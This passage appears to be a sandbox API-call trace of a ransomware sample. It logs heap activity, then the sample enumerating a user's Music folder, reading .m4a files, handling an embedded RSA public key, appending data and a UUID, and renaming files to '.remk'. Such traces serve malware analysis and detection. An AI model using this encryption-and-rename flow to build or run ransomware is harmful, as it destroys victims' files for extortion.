(HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0234.310] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.310] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.310] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.310] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.310] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.310] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0234.310] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.310] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0234.310] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0234.310] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.310] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0234.310] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.310] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.311] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.311] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.311] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.311] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.311] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.311] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.311] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.311] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.311] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.311] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.311] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.311] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.311] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.311] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0234.312] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.312] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0234.312] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.312] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.312] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0234.312] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.312] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0234.312] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.312] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.312] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.312] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.312] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.312] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0234.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0234.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0234.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.314] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\") returned="Xb4anhaDsw_nEnBFeS\\" [0234.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0234.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5808 [0234.314] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.314] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0234.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bc1a0 [0234.314] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0234.314] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0234.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0234.314] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc1a0 | out: hHeap=0x630000) returned 1 [0234.314] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0234.314] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0234.314] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0234.314] PathFindFileNameW (pszPath="") returned="" [0234.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0234.314] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x461909e0, ftCreationTime.dwHighDateTime=0x1d5dec4, ftLastAccessTime.dwLowDateTime=0xa565df90, ftLastAccessTime.dwHighDateTime=0x1d5dcc6, ftLastWriteTime.dwLowDateTime=0xa565df90, ftLastWriteTime.dwHighDateTime=0x1d5dcc6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0234.315] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0234.315] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x461909e0, ftCreationTime.dwHighDateTime=0x1d5dec4, ftLastAccessTime.dwLowDateTime=0xa565df90, ftLastAccessTime.dwHighDateTime=0x1d5dcc6, ftLastWriteTime.dwLowDateTime=0xa565df90, ftLastWriteTime.dwHighDateTime=0x1d5dcc6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0234.315] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3766b590, ftCreationTime.dwHighDateTime=0x1d5da29, ftLastAccessTime.dwLowDateTime=0x78512300, ftLastAccessTime.dwHighDateTime=0x1d5e5f1, ftLastWriteTime.dwLowDateTime=0x78512300, ftLastWriteTime.dwHighDateTime=0x1d5e5f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-wYl9Wxaf_FQLu8dRQB5", cAlternateFileName="-WYL9W~1")) returned 1 [0234.315] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6420 [0234.315] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0234.315] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6570 [0234.317] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0234.317] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6420 | out: hHeap=0x630000) returned 1 [0234.317] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafd3f740, ftCreationTime.dwHighDateTime=0x1d5dd3f, ftLastAccessTime.dwLowDateTime=0xf75e44d0, ftLastAccessTime.dwHighDateTime=0x1d5d902, ftLastWriteTime.dwLowDateTime=0xf75e44d0, ftLastWriteTime.dwHighDateTime=0x1d5d902, nFileSizeHigh=0x0, nFileSizeLow=0x163d5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0IVabRQYVPOOzITA.m4a", cAlternateFileName="0IVABR~1.M4A")) returned 1 [0234.317] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.317] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x31a4610 [0234.317] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.317] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\0IVabRQYVPOOzITA.m4a") returned=".m4a" [0234.317] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\0IVabRQYVPOOzITA.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\0ivabrqyvpoozita.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.318] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=91093) returned 1 [0234.318] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.320] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x163af, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.320] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.321] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.321] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.321] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.322] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x163d5, lpOverlapped=0x0) returned 1 [0234.323] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.323] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.323] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.323] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0234.324] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.324] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.324] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.324] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.324] GetLastError () returned 0x0 [0234.324] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.324] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0234.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.324] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.324] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.324] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.324] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.325] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x163d5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.325] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.325] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.325] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.326] CloseHandle (hObject=0x640) returned 1 [0234.330] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\0IVabRQYVPOOzITA.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\0ivabrqyvpoozita.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\0IVabRQYVPOOzITA.m4a.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\0ivabrqyvpoozita.m4a.remk")) returned 1 [0234.331] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc408 | out: hHeap=0x630000) returned 1 [0234.331] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.331] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0234.332] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4610 | out: hHeap=0x630000) returned 1 [0234.332] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc392850, ftCreationTime.dwHighDateTime=0x1d5e10b, ftLastAccessTime.dwLowDateTime=0x126ef8d0, ftLastAccessTime.dwHighDateTime=0x1d5e2dd, ftLastWriteTime.dwLowDateTime=0x126ef8d0, ftLastWriteTime.dwHighDateTime=0x1d5e2dd, nFileSizeHigh=0x0, nFileSizeLow=0x11856, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="542fVbx-Nb5SSv6oh8A5.m4a", cAlternateFileName="542FVB~1.M4A")) returned 1 [0234.332] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\542fVbx-Nb5SSv6oh8A5.m4a") returned=".m4a" [0234.332] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\542fVbx-Nb5SSv6oh8A5.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\542fvbx-nb5ssv6oh8a5.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.334] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=71766) returned 1 [0234.334] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.336] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x11830, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.336] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.337] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, 